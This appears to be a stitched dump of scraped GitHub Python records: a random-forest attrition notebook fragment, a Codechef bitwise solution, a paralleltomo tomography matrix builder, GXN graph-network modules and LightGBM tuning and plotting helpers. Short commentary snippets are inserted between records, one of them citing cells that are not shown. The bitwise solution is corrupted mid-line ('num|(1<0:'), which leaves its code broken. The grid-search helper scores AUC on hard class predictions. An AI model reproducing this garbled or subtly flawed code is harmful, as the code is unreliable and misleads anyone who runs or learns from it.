GridSearchCV(rf_estimator_tuned, params_rf, scoring = scorer, cv = 3, n_jobs=-1)\n\ngrid_obj2 = grid_obj.fit(x_train, y_train)\n\n# Set the classifier to the best combination of parameters\nrf_estimator_tuned = grid_obj2.best_estimator_\n\n\n# In[66]:\n\n\nrf_estimator_tuned.fit(x_train, y_train)\n\n\n# In[67]:\n\n\n# Checking performance on the training data\ny_pred_train_rf_tuned = rf_estimator_tuned.predict(x_train)\n\nmetrics_score(y_train, y_pred_train_rf_tuned)\n\n\n# In[68]:\n\n\n# Plotting feature importance\nimportances = rf_estimator_tuned.feature_importances_\n\ncolumns = X.columns\n\nimportance_df = pd.DataFrame(importances, index = columns, columns = ['Importance']).sort_values(by = 'Importance', ascending = False)\n\nplt.figure(figsize = (13, 13))\n\nsns.barplot(importance_df.Importance, importance_df.index)\n\n\n# In[ 
]:\n\n\n\n\n","repo_name":"Hangzhouer22/machine-learning","sub_path":"machine learning employee attrition.py","file_name":"machine learning employee attrition.py","file_ext":"py","file_size_in_byte":17878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
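The decision-tree cells in the record above pass class_weight = {0: 0.17, 1: 0.83}, which mirrors the ~16% attrition rate it reports; a small sketch (not from the original notebook) of deriving such weights from the label distribution:

import numpy as np

y = np.array([0] * 84 + [1] * 16)          # stand-in for ~16% attrition labels
pos_rate = y.mean()                        # 0.16
weights = {0: pos_rate, 1: 1 - pos_rate}   # the minority class gets the larger weight
print(weights)                             # {0: 0.16, 1: 0.84}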
+{"seq_id":"34357820830","text":"import random\ndef bruteForce(x,y,l,r):\n maxVal = -1\n zMax = 0\n for num in range(l, r+1):\n temp = F(x,y,num)\n if temp > maxVal:\n maxVal = temp\n zMax = num\n return zMax\nclass Bit:\n def setBit(self, num, pos):\n return num|(1<0:\n pos-=1\n currMax = float(\"-inf\")\n z = 0\n possibleValues = [l,r]\n for posForZ1 in range(pos-1, -1, -1):\n if bitObj.getBit(l, posForZ1):\n continue\n z1 = bitObj.setBit(l, posForZ1)\n for rest in range(posForZ1-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z1 = bitObj.setBit(z1, rest)\n else:\n z1 = bitObj.unsetBit(z1, rest)\n possibleValues.append(z1)\n for posForZ2 in range(pos-1, -1, -1):\n if not bitObj.getBit(r, posForZ2):\n continue\n z2 = bitObj.unsetBit(r, posForZ2)#unsetting the bit to make it less than r\n for rest in range(posForZ2-1, -1, -1):\n if bitObj.getBit(x, rest) or bitObj.getBit(y, rest):#to minimize the value\n z2 = bitObj.setBit(z2, rest)\n else:\n z2 = bitObj.unsetBit(z2, rest)\n possibleValues.append(z2)\n possibleValues.sort()\n for num in possibleValues:\n value = F(x,y, num)\n if value > currMax:\n z = num\n currMax = value\n # if z!= bruteForce(x,y,l,r):\n print(z)\n # break\n\n#\n#\n","repo_name":"subho2107/Codechef","sub_path":"May long challenge/chef and bitwise product.py","file_name":"chef and bitwise product.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"12626981494","text":"def paralleltomo(*args):\r\n#PARALLELTOMO Creates a 2D tomography system matrix using parallel beams\r\n#\r\n# [A,theta,p,d] = paralleltomo(N)\r\n# [A,theta,p,d] = paralleltomo(N,theta)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p)\r\n# [A,theta,p,d] = paralleltomo(N,theta,p,d)\r\n#\r\n# This function creates a 2D tomography test problem with an N-times-N\r\n# domain, using p parallel rays for each angle in the vector theta.\r\n#\r\n# Input: \r\n# N Scalar denoting the number of discretization intervals in \r\n# each dimesion, such that the domain consists of N^2 cells.\r\n# theta Vector containing the angles in degrees. Default: theta = \r\n# 0:1:179.\r\n# p Number of parallel rays for each angle. Default: p =\r\n# round(sqrt(2)*N).\r\n# d Scalar denoting the distance from the first ray to the last.\r\n# Default: d = sqrt(2)*N.\r\n#\r\n# Output:\r\n# A Coefficient matrix with N^2 columns and nA*p rows, \r\n# where nA is the number of angles, i.e., length(theta).\r\n# theta Vector containing the used angles in degrees.\r\n# p The number of used rays for each angle.\r\n# d The distance between the first and the last ray.\r\n# \r\n# See also: fanbeamtomo, seismictomo.\r\n\r\n#Anders Nymark Christensen, 20180216, DTU Compute\r\n#Revised from the matlab version by:\r\n \r\n# Jakob Sauer Jørgensen, Maria Saxild-Hansen and Per Christian Hansen,\r\n# October 1, 201r, DTU Compute.\r\n\r\n# Reference: A. C. Kak and M. Slaney, Principles of Computerized \r\n# Tomographic Imaging, SIAM, Philadelphia, 2001.\r\n \r\n\r\n import numpy as np\r\n from scipy.sparse import csr_matrix\r\n \r\n N = args[0]\r\n\r\n \r\n # Default value of d.\r\n if len(args) < 4:\r\n d = np.sqrt(2)*N\r\n else:\r\n d = args[3]\r\n \r\n # Default value of the number of rays.\r\n if len(args) < 3:\r\n p = int(round(np.sqrt(2)*N))\r\n else:\r\n p = args[2]\r\n\r\n # Default value of the angles theta.\r\n if len(args) < 2:\r\n theta = np.matrix(np.arange(0.,180.))\r\n else:\r\n theta = args[1]\r\n\r\n\r\n # Define the number of angles.\r\n nA = theta.shape[1]\r\n\r\n # The starting values both the x and the y coordinates. \r\n x0 = np.matrix(np.linspace(-d/2,d/2,p)).T\r\n y0 = np.matrix(np.zeros([p,1]))\r\n\r\n # The intersection lines.\r\n x = np.matrix(np.arange(-N/2,N/2 + 1)).T\r\n y = np.copy(x)\r\n\r\n # Initialize vectors that contains the row numbers, the column numbers and\r\n # the values for creating the matrix A effiecently.\r\n rows = np.matrix(np.zeros([2*N*nA*p,1]))\r\n cols = np.copy(rows)\r\n vals = np.copy(rows)\r\n idxend = 0\r\n\r\n\r\n # Loop over the chosen angles.\r\n for i in range(0,nA):\r\n \r\n # All the starting points for the current angle.\r\n x0theta = np.cos(np.deg2rad(theta[0,i]))*x0-np.sin(np.deg2rad(theta[0,i]))*y0\r\n y0theta = np.sin(np.deg2rad(theta[0,i]))*x0+np.cos(np.deg2rad(theta[0,i]))*y0\r\n \r\n # The direction vector for all the rays corresponding to the current \r\n # angle.\r\n a = -np.sin(np.deg2rad(theta[0,i]))\r\n b = np.cos(np.deg2rad(theta[0,i]))\r\n \r\n # Loop over the rays.\r\n for j in range(0,p):\r\n \r\n # Use the parametrisation of line to get the y-coordinates of\r\n # intersections with x = k, i.e. x constant.\r\n tx = (x - x0theta[j,0])/a\r\n yx = b*tx + y0theta[j,0]\r\n \r\n # Use the parametrisation of line to get the x-coordinates of\r\n # intersections with y = k, i.e. y constant.\r\n ty = (y - y0theta[j,0])/b\r\n xy = a*ty + x0theta[j,0] \r\n \r\n # Collect the intersection times and coordinates. 
\r\n            t = np.vstack([tx, ty])\r\n            xxy = np.vstack([x, xy])\r\n            yxy = np.vstack([yx, y])\r\n            \r\n            # Sort the coordinates according to intersection time.\r\n            I = np.argsort(t,0)\r\n            xxy = xxy[I]\r\n            yxy = yxy[I]\r\n            \r\n            # Skip the points outside the box.\r\n            I1 = np.logical_and(np.array(xxy) >= -N/2 , np.array(xxy) <= N/2)\r\n            I2 = np.logical_and(np.array(yxy) >= -N/2 , np.array(yxy) <= N/2)\r\n            I = np.squeeze(np.logical_and(I1,I2))\r\n            #I = (xxy >= -N/2 & xxy <= N/2 & yxy >= -N/2 & yxy <= N/2)\r\n            xxy = np.squeeze(xxy[I])\r\n            yxy = np.squeeze(yxy[I])\r\n            \r\n            # Skip double points.\r\n            I = np.logical_and(abs(np.diff(xxy)) <= 1e-10 , abs(np.diff(yxy)) <= 1e-10)\r\n            if I.size != 0:\r\n                I = np.concatenate((I, np.matrix([False])), axis=1)\r\n                xxy = xxy[~I]\r\n                yxy = yxy[~I]\r\n#            xxy = np.delete(xxy,I)\r\n#            yxy = np.delete(yxy,I)\r\n            \r\n            # Calculate the length within each cell and determine the number of\r\n            # cells which are hit. Use a name distinct from the ray-span\r\n            # distance d, which is returned to the caller and must not be\r\n            # overwritten here.\r\n            seg_len = np.sqrt(np.power(np.diff(xxy),2) + np.power(np.diff(yxy),2))\r\n            numvals = seg_len.shape[1]\r\n            \r\n            # Store the values inside the box.\r\n            if numvals > 0:\r\n                \r\n                # If the ray is on the boundary of the box in the top or to the\r\n                # right, the ray does not by definition lie within a valid cell.\r\n                if not ((b == 0 and abs(y0theta[j,0] - N/2) < 1e-15) or (a == 0 and abs(x0theta[j,0] - N/2) < 1e-15)):\r\n                    \r\n                    # Calculate the midpoints of the line within the cells.\r\n                    xm = 0.5*(xxy[0,0:-1]+xxy[0,1:]) + N/2\r\n                    ym = 0.5*(yxy[0,0:-1]+yxy[0,1:]) + N/2\r\n                    \r\n                    # Translate the midpoint coordinates to index.\r\n                    col = np.floor(xm)*N + (N - np.floor(ym)) - 1\r\n                    \r\n                    # Create the indices to store the values to vector for\r\n                    # later creation of A matrix.\r\n                    idxstart = idxend\r\n                    idxend = idxstart + numvals\r\n                    idx = np.arange(idxstart,idxend)\r\n                    \r\n                    # Store row numbers, column numbers and values. \r\n                    rows[idx,0] = i*p + j\r\n                    cols[idx,0] = col[0,:]\r\n                    vals[idx,0] = seg_len\r\n\r\n\r\n    # Truncate excess zeros.\r\n    rows = rows[0:idxend]\r\n    cols = cols[0:idxend]\r\n    vals = vals[0:idxend]\r\n    \r\n    # Create sparse matrix A from the stored values (np.float is deprecated; plain float works).\r\n    A = csr_matrix((vals[:,0].astype(float), (np.squeeze(np.array(rows[:,0]).astype(int)), np.squeeze(np.array(cols[:,0]).astype(int)))), dtype=float, shape=(p*nA, N**2)).toarray()\r\n\r\n    \r\n    return [A,theta,p,d]\r\n\r\nimport numpy as np\r\nN=8\r\ntheta = np.matrix([45.0000, 67.5000, 90.0000, 112.5000, 135.0000, 157.5000, 180.0000, 202.5000, 225.0000, 247.5000, 270.0000, 292.5000, 315.0000])\r\n[A,theta,p,d] = paralleltomo(N,theta,11)\r\n\r\nnp.linalg.matrix_rank(A)\r\n\r\nN=200\r\ntheta = np.matrix(np.linspace(0,179,179))\r\np = 250\r\n[A,theta,p,d] = paralleltomo(N,theta,p)\r\n","repo_name":"npeuker/MathModellingDTU","sub_path":"Exam Project/paralleltomo.py","file_name":"paralleltomo.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
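A tiny numeric check of the line parametrisation used in paralleltomo above: a ray starting at (x0, y0) with direction (a, b) crosses the vertical grid line x = k at t = (k - x0)/a, and its height there is y0 + b*t. The values below are made up.

import numpy as np

x0, y0 = -1.5, 0.0                 # ray start
a = np.cos(np.deg2rad(45.0))       # direction x component
b = np.sin(np.deg2rad(45.0))       # direction y component
k = 1.0                            # vertical grid line x = k
t = (k - x0) / a                   # crossing parameter, ~3.54
print(y0 + b * t)                  # ~2.5, the crossing height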
+{"seq_id":"39378918420","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport math\nimport numpy as np\nimport scipy.sparse as sp\n\n\ndef spec_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef spac_normalize_adj(adj, high_order=False):\n adj = adj.to_dense().cpu().numpy()\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -1.).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n adj_norm = adj.dot(d_mat_inv_sqrt).transpose().tocoo()\n return torch.FloatTensor(adj_norm.todense())\n\n\ndef normalize_adj_torch(mx):\n mx = mx.to_dense()\n rowsum = mx.sum(1)\n r_inv_sqrt = torch.pow(rowsum, -0.5).flatten()\n r_inv_sqrt[torch.isinf(r_inv_sqrt)] = 0.\n r_mat_inv_sqrt = torch.diag(r_inv_sqrt)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n mx = torch.transpose(mx, 0, 1)\n mx = torch.matmul(mx, r_mat_inv_sqrt)\n return mx\n\n\nclass MLP(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=bias)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, x):\n x_fts = self.fc(x)\n if self.bias is not None:\n x_fts += self.bias\n return self.act(x_fts)\n\n\nclass GCN_MI(nn.Module):\n def __init__(self, in_ft, out_ft, act='prelu', bias=True):\n super().__init__()\n self.fc = nn.Linear(in_ft, out_ft, bias=False)\n self.act = nn.PReLU() if act == 'prelu' else act\n\n if bias:\n self.bias = nn.Parameter(torch.FloatTensor(out_ft))\n self.bias.data.fill_(0.0)\n else:\n self.register_parameter('bias', None)\n\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, A, x, sparse=False):\n x_fts = self.fc(x)\n if sparse:\n out = torch.unsqueeze(torch.spmm(A, torch.squeeze(x_fts, 0)), 0)\n else:\n out = torch.bmm(A.unsqueeze(0), x_fts.unsqueeze(0))\n if self.bias is not None:\n out += self.bias\n return self.act(out).squeeze(0)\n\n\nclass GCN(nn.Module):\n\n def __init__(self, in_dim, out_dim):\n super(GCN, self).__init__()\n self.proj = nn.Linear(in_dim, out_dim)\n self.drop = nn.Dropout(p=0.3)\n\n def forward(self, A, X, act=None):\n X = self.drop(X)\n X = torch.matmul(A, X)\n X = self.proj(X)\n if act is not None:\n X = act(X)\n return X\n\n\nclass Discriminator(nn.Module):\n def __init__(self, n_h):\n super().__init__()\n self.f_k = nn.Bilinear(n_h, n_h, 1)\n for m in self.modules():\n self.weights_init(m)\n\n def weights_init(self, m):\n if isinstance(m, nn.Bilinear):\n torch.nn.init.xavier_uniform_(m.weight.data)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n def forward(self, c, h_pl, h_mi, s_bias1=None, s_bias2=None):\n c_x = c\n sc_1 = 
torch.squeeze(self.f_k(h_pl, c_x), -2)\n sc_2 = torch.squeeze(self.f_k(h_mi, c_x), -2)\n if s_bias1 is not None:\n sc_1 += s_bias1\n if s_bias2 is not None:\n sc_2 += s_bias2\n\n logits = torch.cat((sc_1, sc_2), 0).squeeze(-1)\n v = logits.shape[0]\n\n return logits, logits[:v//2]\n\n\nclass GraphCrossnet(nn.Module):\n def __init__(self, ks, in_dim, out_dim, dim=48, cross_weight=1.0, fuse_weight=1.0, R=1, cross_layer=2):\n super(GraphCrossnet, self).__init__()\n self.ks = ks\n self.cs_w = cross_weight\n self.fs_w = fuse_weight\n self.cs_l = cross_layer\n\n self.start_gcn_s1 = GCN(in_dim, dim)\n self.start_gcn_s2 = GCN(dim, dim)\n self.end_gcn = GCN(2*dim, out_dim)\n\n self.index_select_s1 = IndexSelect(ks[0], dim, act='prelu', R=R)\n self.index_select_s2 = IndexSelect(ks[1], dim, act='prelu', R=R)\n self.pool_s12_start = GraphPool(dim)\n self.pool_s23_start = GraphPool(dim)\n self.unpool_s21_end = GraphUnpool(dim)\n self.unpool_s32_end = GraphUnpool(dim)\n\n self.s1_l1 = GCN(dim, dim)\n self.s1_l2 = GCN(dim, dim)\n self.s1_l3 = GCN(dim, dim)\n self.s2_l1 = GCN(dim, dim)\n self.s2_l2 = GCN(dim, dim)\n self.s2_l3 = GCN(dim, dim)\n self.s3_l1 = GCN(dim, dim)\n self.s3_l2 = GCN(dim, dim)\n self.s3_l3 = GCN(dim, dim)\n\n if self.cs_l>=1:\n self.pool_s12_1 = GraphPool(dim, g=True)\n self.unpool_s21_1 = GraphUnpool(dim)\n self.pool_s23_1 = GraphPool(dim, g=True)\n self.unpool_s32_1 = GraphUnpool(dim)\n if self.cs_l>=2:\n self.pool_s12_2 = GraphPool(dim, g=True)\n self.unpool_s21_2 = GraphUnpool(dim)\n self.pool_s23_2 = GraphPool(dim, g=True)\n self.unpool_s32_2 = GraphUnpool(dim)\n\n def forward(self, A, x):\n\n A_s1 = A\n x_s1 = self.start_gcn_s1(A_s1, x)\n x_org = x_s1\n x_s1_ = torch.zeros_like(x_s1)\n x_s1_ = x_s1[torch.randperm(x_s1.shape[0]),:]\n ret_s1, value_s1, idx_s1, idx_s1_, Xdown_s1 = self.index_select_s1(x_s1, x_s1_, A_s1) \n x_s2, A_s2 = self.pool_s12_start(A_s1, x_s1, idx_s1, idx_s1_, value_s1, initlayer=True)\n\n x_s2 = self.start_gcn_s2(A_s2, x_s2)\n x_s2_ = torch.zeros_like(x_s2)\n x_s2_ = x_s2[torch.randperm(x_s2.shape[0]),:]\n ret_s2, value_s2, idx_s2, idx_s2_, Xdown_s2 = self.index_select_s2(x_s2, x_s2_, A_s2)\n x_s3, A_s3 = self.pool_s23_start(A_s2, x_s2, idx_s2, idx_s2_, value_s2, initlayer=True)\n\n res_s1_0, res_s2_0, res_s3_0 = x_s1, x_s2, x_s3\n\n x_s1 = self.s1_l1(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l1(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l1(A_s3, x_s3, F.relu)\n\n res_s1_1, res_s2_1, res_s3_1 = x_s1, x_s2, x_s3\n\n if self.cs_l >= 1:\n x_s12_fu = self.pool_s12_1(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_1(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_1(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_1(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * x_s21_fu + res_s1_0\n x_s2 = x_s2 + self.cs_w * (x_s12_fu + x_s32_fu)/2 + res_s2_0\n x_s3 = x_s3 + self.cs_w * x_s23_fu + res_s3_0\n\n x_s1 = self.s1_l2(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l2(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l2(A_s3, x_s3, F.relu)\n\n if self.cs_l >= 2:\n x_s12_fu = self.pool_s12_2(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_2(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_2(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_2(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * 0.05 * x_s21_fu\n x_s2 = x_s2 + self.cs_w * 0.05 * (x_s12_fu + x_s32_fu)/2\n x_s3 = x_s3 + self.cs_w * 0.05 * x_s23_fu\n\n x_s1 = self.s1_l3(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l3(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l3(A_s3, x_s3, 
F.relu)\n \n x_s3_out = self.unpool_s32_end(A_s2, x_s3, idx_s2) + Xdown_s2\n x_s2_out = self.unpool_s21_end(A_s1, x_s2 + x_s3_out, idx_s1)\n x_agg = x_s1 + x_s2_out * self.fs_w + Xdown_s1 * self.fs_w\n x_agg = torch.cat([x_agg, x_org], 1)\n x_agg = self.end_gcn(A_s1, x_agg)\n\n return x_agg, ret_s1, ret_s2\n\n\nclass IndexSelect(nn.Module):\n\n def __init__(self, k, n_h, act, R=1):\n super().__init__()\n self.k = k\n self.R = R\n self.sigm = nn.Sigmoid()\n self.fc = MLP(n_h, n_h, act)\n self.disc = Discriminator(n_h)\n self.gcn1 = GCN(n_h, n_h)\n\n def forward(self, seq1, seq2, A, samp_bias1=None, samp_bias2=None):\n h_1 = self.fc(seq1)\n h_2 = self.fc(seq2)\n h_n1 = self.gcn1(A, h_1)\n\n X = self.sigm(h_n1)\n ret, ret_true = self.disc(X, h_1, h_2, samp_bias1, samp_bias2)\n scores = self.sigm(ret_true).squeeze()\n num_nodes = A.shape[0]\n values, idx = torch.topk(scores, int(num_nodes))\n values1, idx1 = values[:int(self.k*num_nodes)], idx[:int(self.k*num_nodes)]\n values0, idx0 = values[int(self.k*num_nodes):], idx[int(self.k*num_nodes):]\n\n return ret, values1, idx1, idx0, h_n1\n\n\nclass GraphPool(nn.Module):\n\n def __init__(self, in_dim, g=False):\n super(GraphPool, self).__init__()\n self.g = g\n if self.g:\n self.down_gcn = GCN(in_dim, in_dim)\n \n def forward(self, A, X, idx, idx_=None, value=None, initlayer=False):\n if self.g:\n X = self.down_gcn(A, X)\n\n new_x = X[idx,:]\n score = torch.unsqueeze(value, -1)\n new_x = torch.mul(new_x, score)\n\n if initlayer:\n A = self.removeedge(A, idx)\n return new_x, A\n else:\n return new_x\n\n def removeedge(self, A, idx):\n A_ = A[idx,:]\n A_ = A_[:,idx]\n return A_\n\n \n\nclass GraphUnpool(nn.Module):\n\n def __init__(self, in_dim):\n super(GraphUnpool, self).__init__()\n self.up_gcn = GCN(in_dim, in_dim)\n\n def forward(self, A, X, idx):\n\n new_X = torch.zeros([A.shape[0], X.shape[1]]).to(X.device)\n new_X[idx] = X\n new_X = self.up_gcn(A, new_X)\n return new_X","repo_name":"limaosen0/GXN","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"}
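A numeric check of the math behind spec_normalize_adj in the record above (symmetric normalization D^-1/2 A D^-1/2), done in plain numpy on a made-up two-node graph with a symmetric adjacency:

import numpy as np

A = np.array([[0., 1.],
              [1., 1.]])              # node 1 has a self-loop (made-up)
d = A.sum(1)                          # degrees: [1., 2.]
D_inv_sqrt = np.diag(d ** -0.5)
print(D_inv_sqrt @ A @ D_inv_sqrt)    # off-diagonal entries become 1/sqrt(1*2) ~ 0.707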
+{"seq_id":"22483337693","text":"\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\nfrom lightgbm import LGBMClassifier\r\nimport lightgbm as lgb\r\nfrom toad.metrics import KS, F1, AUC\r\n\r\nfrom sklearn.metrics import roc_curve\r\nimport pandas as pd\r\nimport numpy as np\r\nimport logging\r\nfrom pyecharts import options as opts\r\nfrom pyecharts.charts import Bar, Grid, Line\r\n# 日志管理\r\nlogger_name = \"lgbm\"\r\nlogger = logging.getLogger(logger_name)\r\nlogger.setLevel(logging.DEBUG)\r\nlogger.info('test')\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\n\r\ndef init_feature(x_train, y_train):\r\n X, Y = x_train, y_train\r\n lgbm_model = LGBMClassifier(\r\n learning_rate=0.05,\r\n n_estimators=500,\r\n max_depth=4,\r\n min_split_gain=0.01,\r\n min_child_samples=20,\r\n subsample=1,\r\n colsample_bytree=1,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_param = lgbm_model.get_params()\r\n lgbm_train = lgb.Dataset(X, Y)\r\n lgbm_param.pop('silent')\r\n lgbm_param.pop('n_estimators')\r\n\r\n '''使用交叉验证的方式确定最优的树数量'''\r\n cvresult = lgb.cv(lgbm_param, lgbm_train, num_boost_round=100, nfold=4, metrics=['auc','binary_logloss'], early_stopping_rounds=100)\r\n best_n_estimators = len(cvresult['auc-mean'])\r\n print('确定最优的树数量', best_n_estimators)\r\n\r\n lgbm_model.set_params(n_estimators=best_n_estimators)\r\n # lgbm_model.fit(X,Y,eval_metric='auc')\r\n lgbm_model.fit(X, Y, eval_metric=['auc', 'binary_logloss'])\r\n\r\n feat_imp = pd.Series(lgbm_model.feature_importances_, index=X.columns)\r\n feat_imp = feat_imp.sort_values(ascending=False)\r\n\r\n valid_feature_num = len(np.where(feat_imp > 0)[0]) # 有效变量是有feature_importance的变量(在lgbm树模型中有贡献的变量,其他的变量没有用到)\r\n print('有效变量数为{0}个'.format(valid_feature_num))\r\n\r\n return feat_imp\r\n\r\n\r\n\r\n# from sklearn import svm, datasets\r\n# from sklearn.model_selection import GridSearchCV\r\n# iris = datasets.load_iris()\r\n# parameters = {'kernel':('linear', 'rbf'), 'C':[1, 10]}\r\n# svc = svm.SVC()\r\n# clf = GridSearchCV(svc, parameters,scoring='roc_auc',cv=4)\r\n# clf.fit(iris.data[0:100], iris.target[0:100])\r\nparameters={'num_leaves':[i for i in range(10,50,1)],\r\n 'max_depth':[2,3,4,5,6],\r\n 'learning_rate':[0.001,0.003,0.005]+[i/100 for i in range(1,11)],\r\n 'n_estimators':range(100,500,2),\r\n 'min_split_gain':[i/100 for i in range(0,10,1)],\r\n 'min_child_weight':[0.001,0.003,0.005,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09],\r\n 'min_child_samples':[i for i in range(10,50,1)],\r\n 'subsample':[i/10 for i in range(6,11)],\r\n 'colsample_bytree':[i/10 for i in range(6,11)],\r\n 'reg_alpha':[i/100 for i in range(0,200,1)],\r\n 'reg_lambda':[i/10 for i in range(70,200,1)]\r\n }\r\n\r\ndef grid_search(parameters,x_train, x_test, y_train, y_test):\r\n best_auc = 0\r\n for num_leaves in parameters['num_leaves']:\r\n for max_depth in parameters['max_depth']:\r\n for learning_rate in parameters['learning_rate']:\r\n for n_estimators in parameters['n_estimators']:\r\n # for min_split_gain in parameters['min_split_gain']:\r\n # for min_child_weight in parameters['min_child_weight']:\r\n # for min_child_samples in parameters['min_child_samples']:\r\n # for subsample in parameters['subsample']:\r\n # for colsample_bytree in parameters['colsample_bytree']:\r\n # for reg_alpha in parameters['reg_alpha']:\r\n # for reg_lambda in parameters['reg_lambda']:\r\n # logger.info('{},{},{},{},{},{},{},{},{},{},{}'.format(num_leaves,\r\n # max_depth,\r\n # learning_rate,\r\n # n_estimators,\r\n # min_split_gain,\r\n # min_child_weight,\r\n # 
min_child_samples,\r\n # subsample,\r\n # colsample_bytree,\r\n # reg_alpha,\r\n # reg_lambda\r\n # ))\r\n lgbm_model = LGBMClassifier(\r\n num_leaves=num_leaves,\r\n max_depth=max_depth,\r\n learning_rate=learning_rate,\r\n n_estimators=n_estimators,\r\n # min_split_gain=min_split_gain,\r\n # min_child_weight=min_child_weight,\r\n # min_child_samples=min_child_samples,\r\n # subsample=subsample,\r\n # colsample_bytree=colsample_bytree,\r\n # reg_alpha=reg_alpha,\r\n # reg_lambda=reg_lambda,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_model.fit(x_train, y_train, eval_metric='auc')\r\n preds = lgbm_model.predict(x_test)\r\n auc = AUC(preds,y_test)\r\n if auc>best_auc:\r\n best_auc = auc\r\n logger.info('test auc:{}'.format(best_auc))\r\n best_para = lgbm_model.get_params()\r\n return best_para\r\n\r\n\r\n\r\ndef py_overlap(feature,cut_list,train_cnt_rate,oot_cnt_rate,train_due_rate,oot_due_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_rate\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_rate\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n\r\n line = (\r\n Line()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_due\",\r\n train_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_due\",\r\n oot_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n )\r\n\r\n overlap_1 = bar.overlap(line)\r\n overlap_1.render_notebook()\r\n return overlap_1\r\n\r\n\r\n\r\n\r\n\r\ndef xw_bar(feature,cut_list,train_cnt_rate,oot_cnt_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return bar\r\n\r\n\r\n\r\ndef xw_line(feature,cut_list,train_due_rate,oot_due_rate):\r\n line = (\r\n Line()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n 